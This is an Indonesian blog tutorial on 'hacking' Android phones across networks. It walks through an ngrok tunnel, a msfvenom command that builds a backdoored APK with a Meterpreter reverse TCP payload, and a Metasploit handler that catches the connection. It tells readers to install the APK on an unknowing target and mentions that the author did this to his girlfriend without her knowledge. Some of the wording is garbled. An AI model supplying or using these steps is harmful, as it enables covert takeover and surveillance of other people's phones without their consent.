HACK ANDROID BEDA JARINGAN PART II TERBARU

 selamat siang guys,kali ini ane ingin membuatkan tutorial tentang cara meremote android jarak jauh. Oke pribadi saja kita siapkan alat serta bahan-bahannya.
  1. install ngrok(portable tinggal pake aja). Klik Disini
  2. daftar akun ngrok Klik disini
  3. install authtokennya yg di dapat
kalau telah siap semua kita akan mulai,eksklusif saja:
  1. jalankan ngroknya, buka berdasarkan terminal dimana anda mengextrack nya
  2. tunggu sampai online
    yang aku kotakin merah itu port yang kita pakai nanti untuk backdoornya. Terus yg aku kasih warna hijau itu buat LHOST nya dalam backdor (yang rona hijau itu tcp://0.exkjhtl.ngrok.io).
  3. sekarang kita akan untuk backdoornya. Ini command nya msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15838 R>testNgrok.apk
  4. selanjutnya kalian cari targetnya,sebaiknya temennya yg jauh. Kalau ane kmaren buat test pacar ane. Laba orangnya kagak tau hehehe :v  kalian install pelaksanaan backdoor tdi pada sasaran.
  5. setelah itu kalian buka terminal lagi, service posgresql start
    setelah itu baru msfconsole
  6. setelah metasploit terbuka, kita jalan komen seperti biasa. use exploit/multi/handler kemudian enter
  7. set payload android/meterpreter/reverse_tcp kemudian enter
  8. set LHOST 0.0.0.0
  9. set LPORT 4444
  10. exploit
  11. tinggal tunggu aja bro
jika kalian masih resah,kalian sanggup bertanya ke saya atau kalian bisa liat video ane yang ini

kalau kalian gundah hubugi saya di facebook,kalau terdapat kesempatan aku akan ajarkan kalian step by stepnya.
sekian tutorial berdasarkan saya,resiko ditanggung penumpang.

Comments